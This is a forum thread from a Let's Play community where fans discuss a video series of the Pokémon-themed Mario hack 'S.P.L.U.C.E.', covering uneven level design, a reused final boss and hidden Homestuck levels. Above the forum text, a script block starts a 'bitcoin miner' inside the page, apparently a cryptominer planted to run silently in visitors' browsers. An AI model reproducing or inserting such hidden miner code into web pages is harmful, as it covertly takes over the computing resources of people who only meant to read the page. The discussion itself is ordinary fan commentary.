<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectmario fan games galaxy

S.P.L.U.C.E. - What's that random reference?!

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
The Doctor

Re: S.P.L.U.C.E. - What's that random reference?!

Postby The Doctor » 6 years ago

freelop wrote:Can't help but wonder if the original green boss caused earthquakes with his bounces.
That would have caused a bit of extra garbage difficulty
Yup, earthquakes were plentiful. :(

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 6 years ago

CRISIS AVERTED

I thought that dragonball gate was too ridiculous to be true at first, but then just for a quick moment I got slightly worried >_> But it's all good, baby. I suppose the 'infinity' symbol is intended as another hint that it's not for real (that is, in addition to coin collection not being marked on the overworld plus people here saying so).

I wonder what the finale will be! This hack has kinda been all over the place.
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 6 years ago

that was a fantastical jokegate

reminds me of this one part in anodyne

by the way, yall, i just remembered that scarlet devil mario series had so many non-mario non-touhou references in them, so whats the difference between that and this HMMMMM????????? (exaggerated intrigue)
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

skyluigi2

Postby skyluigi2 » 6 years ago

swirlybomb wrote:This hack has kinda been all over the place.
This basically sums everything up. It really has; it's had good portions... and um, very uh... questionable sections. Looking forward to seeing what's waiting in the finale, though! I hope this game goes out on a good note.

Yikes

Postby Yikes » 6 years ago

For me, the hack was as good as it's worst levels. All the normal levels were just there and were not memorable at all, while all the bad levels just stuck out.

I was rewatching Mario Gives Up 2 and was surprised how similar some of the gimmick levels are compared to SPLUCE. MGU 2 had a Meteor stage, it had a minecart-level and it had all that fancy custom stuff. It just feels like MGU 2 did almost everything right.

Playing through SPLUCE made me better at playing Mario Games. No more, no less. Also raocow should have used an infinite lives cheat (C222-D4DD) for this one. Getting the dragon coins is ridiculous, farming 20 lives with the star in world 1 feels redundant and not having a bonus stage after 100 goal points is a questionable design decision to say the least.

Well, I'll always remember this video series for being a thing.
Gesundheit!

Unaniem
Desperately trying to figure out just what the hell
First name: Tree

Postby Unaniem » 6 years ago

This hack was weird.

Like said millions of times before in the thread, the quality of the hack is all over the place. From decent normals levels, to bad gimmick levels, to clever wrap-arounds, to terribad (albeit optional) levels, to out of place references, to silly jokes, to dumb bosses, to clever ideas, to reusing bosses too quickly after one another and so forth.

I constantly want to give the final level the benefit of being the last level in an already somewhat tough hack (to justify its giant length), and it re-exploring previously used gimmicks and small callbacks is a thing I absolutely adore in final stages, but this level just sort of collapsed on itself in trying to be as ambitious as a finale can be, and just going too far in what it was trying to do, which I find a really big shame.

Considering the final boss was a reuse of an otherwise not all that great previous boss is something I find to be really disappointing. Sure, I said that I thought the "same-boss but different environment" idea was creative before, but when you apply it to the final boss and don't even have it hold a relation to the previous one story or concept wise (like I think the Blastoises could still theoretically work somewhat in this scenario), I just find to be lazy.

Let's just say that I think the hack could've been many times better than it ended up being in the end, but isn't the abysmal of all that is terrible either. Eh.

Also: The fact that both Homestuck and ponies ended up being at least mentioned in the final level I find to be somewhat humorous, albeit not in the way the creator intended to.

Validon98
Goofy Night Sparrow
Pronouns: he/she/they

Postby Validon98 » 6 years ago

"Well that happened" is honestly how I could describe this hack. Other people have already stated what's going on with it in their eyes, and yeah, pretty much there's potential but it is just so wasted. I also kind of find it dumb from just a personal standpoint that a Pokemon themed hack suddenly goes "let's My Little Pony and Homestuck this up." It's not the fact I don't like those two things so much, but more that they have nothing to do with the advertised theme and instead of just being a one-shot reference that everyone points and laughs at before it disappears forever, they keep coming up, Homestuck more than MLP (which besides being briefly mentioned was like... in one other level?). I just find that kind of dumb and silly, but eh.

Of course, there's also some of the gimmicks (because everyone likes a weirdly flopping around Luigi/guy-from-Homestuck-I-don't-know companion who is annoying to guide) and such, which were often not very well used, but of course I'm just repeating prior complaints.

And of course there is that final level. I do think it was nice reusing some of the gimmicks from the past, although there are some times when an overly long final level without a sense of some sort of pre-boss checkpoint is pushing it in terms of difficulty, and that's this case.

All in all, this hack, while probably not the worst, would probably need to be heavily worked on in order to make it generally more enjoyable. At least it's over, right?
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV (everything will be 80 eventually)
Labyrinth of Touhou: Gensokyo and the Heaven-Piercing Great Tree (the sequel ive experienced many times but now on the switch isn't that cool)

Strawberry Bose Partial Translations and Patches!

Rednaxela
Maker of Shenanigans

Postby Rednaxela » 6 years ago

Man... that last level. For some reason I feel like that last level of the hack was completely fitting as a finale, in ways that are both good and bad. I feel like it was a good overall summary of what the hack did well and did poorly.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 6 years ago

Everyone else already stated their opinion on this hack and mine more or less echoes theirs so :T

raolion is very kuwait death nay and I wish he appeared more often (I was catching up with the last few vids)

That ice level music sounds like Katsushika Rhapsody and that pleases me (I used to watch the European Spanish/Castilian dub of Kochikame when I was younger)

raocow's been saying 'testudo' a lot recently and I don't get it.
Go Go Poké Rangers~♪♫♪
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

:pan_pride:

Mata Hari

Postby Mata Hari » 6 years ago

Ah! After ten years I'm free! It's time to conquer the League!

Alice
Pronouns: Girl person

Postby Alice » 6 years ago

The hack author really needs to consider using a multiple midway patch. That last level was more like a world in a level and a world with a single checkpoint at that.

Mineyl

Postby Mineyl » 6 years ago

Alice wrote:The hack author really needs to consider using a multiple midway patch. That last level was more like a world in a level and a world with a single checkpoint at that.
Just think: if Nintendo made that level in this day and age, they'd have taken out the boss AND the midpoint!

Anyway, yeah. Fun hack, but quality's all over the place, yadda-yadda... I'm mildly interested in the vanilla version, now, just to see how this guy's level design gets when he can't rely on chocolate inserts.
raocow wrote:I'm feeling so smug I'm gonna' stare at myself in the mirror for 23 hours!

The Destroyer of Worlds
I am become death

Postby The Destroyer of Worlds » 6 years ago

dr_kraid wrote:Ah! After ten years I'm free! It's time to conquer the League!
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

Rezanator

Postby Rezanator » 6 years ago

Leet wrote:that was a fantastical jokegate

reminds me of this one part in anodyne

by the way, yall, i just remembered that scarlet devil mario series had so many non-mario non-touhou references in them, so whats the difference between that and this HMMMMM????????? (exaggerated intrigue)
The first hack did not even had the SDM!

It would have been nice if this hack had included more pokemon music. Because it's not like there are not enough games and shows to get some tunes out of.

benzeenie
⊂二二二(*^ω^)二⊃

Postby benzeenie » 6 years ago

*double post- sorry!*
Last edited by benzeenie on 04 Mar 2014, 18:02, edited 1 time in total.

benzeenie
⊂二二二(*^ω^)二⊃

Yikes wrote:raocow should have used an infinite lives cheat (C222-D4DD) for this one.
I agree- this is something that I do in the vast majority of hard/hard-ish hacks that I play and also something that has been mentioned several times to raocow and something that he's talked about a fair few times too- I seem to remember him saying that he wouldn't be opposed to the idea and even that he thought it was a good (and fair) idea for a lot of the harder hacks. I don't recall him ever doing so, or even toying with the idea for quite a while though.

Well! I really really enjoyed that! I've had the Vanilla version in my 'waiting to be played' hack folder for ages now, but doubt I'll bother after watching this whole LP.

I don't know why, but as of this morning, I'm unable to post youtube comments- in fact, the comments have only loaded on two out of about ten videos I've watched today. Weird.
I wanted to say that I really liked the Power Rangers music and also to ask-
what the

Code: Select all

Fine, I'll give you FOUR levels, but that's it. Hope you had fun!
part at the end of the video was all about. I'm confused!

Mata Hari

I also failed to understand it myself

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 6 years ago

They are the 'sidepath' homestock/hella jeff levels
the chillaxest of dragonsImage
ImageImage

CodeGorilla

Postby CodeGorilla » 6 years ago

benzeenie wrote:also to ask-
what the

Code: Select all

Fine, I'll give you FOUR levels, but that's it. Hope you had fun!
part at the end of the video was all about. I'm confused!
Those were the directions to get to the hidden Homestuck levels, meaning those are supposed to be post-postgame. Not that that excuses them, but still.

EDIT: ninja'd

Unaniem
Desperately trying to figure out just what the hell
First name: Tree

Postby Unaniem » 6 years ago

They were instructions on how to access the optional Homestuck/SB&HJ levels. (I.e.: "3-Castle Down" = When on the level space of the world three castle, press down and access the stair level.)

EDIT: Double Ninja heck yeah!

Mata Hari

I gotta admit I would have posted that Everett True Homestuck edit already but I lost it when I changed my PC. And the only version I can find online is one where the 'Homestuck' of 'Now let me explain Homestuck' has been rendered in Comic Sans rather than emulating the original text. A truly grievous loss.

And I can't find the Youtub clip neither.

Ometeotl

Postby Ometeotl » 6 years ago

Horikawa Otane wrote:
dr_kraid wrote:Ah! After ten years I'm free! It's time to conquer the League!
Dammit, not yet, you have to wait until MaGLX is finished before you can do that.

Oh no, cutoff.

Ettlesby

Postby Ettlesby » 6 years ago

The only thing I have to say about this is "Go Go PokéRangers."

That's all I HAVE to say, but I'll say a bit more.

This hack looked like an interesting time. Some of it was clever and some of it was not so clever, but for the most part it was fun to watch.

Interesting to see all the references tied together like that, too. That Mewtwo, what a rapscallion.

benzeenie
⊂二二二(*^ω^)二⊃

raocow wrote:They are the 'sidepath' homestock/hella jeff levels
Ohhh! I seee! Those things... I don't really know what homestock/hella jeff is/are, but this hack kind of put me off finding out. Is it to do with Homestar Runner and Strong Bad- that site?

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 6 years ago

Truth be told, I was expecting the hack to only contain Pokemon references and average levels. Then those hidden levels really made me question myself on what I have to expect.

The ending was anti-climatic and sudden, compared to the entire level. Looks like we're moving forward to filler now.
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Return to “let's play”